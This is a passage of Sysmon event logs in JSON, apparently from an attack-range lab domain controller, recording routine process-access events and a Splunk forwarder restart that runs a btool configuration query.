C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3280,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3281,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3282,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3283,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-10FF-5F25-0000-0010FB5E0500}\r\nTargetProcessId: 800\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-10FF-5F25-0000-0010FB5E0500}","TargetProcessId":"800","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3284,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.222\r\nSourceProcessGUID: {E2A3D6B1-10FF-5F25-0000-0010FB5E0500}\r\nSourceProcessId: 800\r\nSourceThreadId: 4956\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.222","SourceProcessGUID":"{E2A3D6B1-10FF-5F25-0000-0010FB5E0500}","SourceProcessId":"800","SourceThreadId":"4956","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3285,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.254\r\nProcessGuid: {E2A3D6B1-1100-5F25-0000-0010FE610500}\r\nProcessId: 2504\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-10FF-5F25-0000-0010D8570500}\r\nParentProcessId: 4864\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=2792","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.254","ProcessGuid":"{E2A3D6B1-1100-5F25-0000-0010FE610500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-10FF-5F25-0000-0010D8570500}","ParentProcessId":"4864","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=2792","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3286,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-10FF-5F25-0000-0010D8570500}\r\nSourceProcessId: 4864\r\nSourceThreadId: 4872\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\r\nTargetProcessGUID: {E2A3D6B1-1100-5F25-0000-0010FE610500}\r\nTargetProcessId: 2504\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+14ab4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d8a0|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-10FF-5F25-0000-0010D8570500}","SourceProcessId":"4864","SourceThreadId":"4872","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE","TargetProcessGUID":"{E2A3D6B1-1100-5F25-0000-0010FE610500}","TargetProcessId":"2504","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+14ab4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d8a0|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3287,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1100-5F25-0000-0010FE610500}\r\nTargetProcessId: 2504\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1100-5F25-0000-0010FE610500}","TargetProcessId":"2504","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3288,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 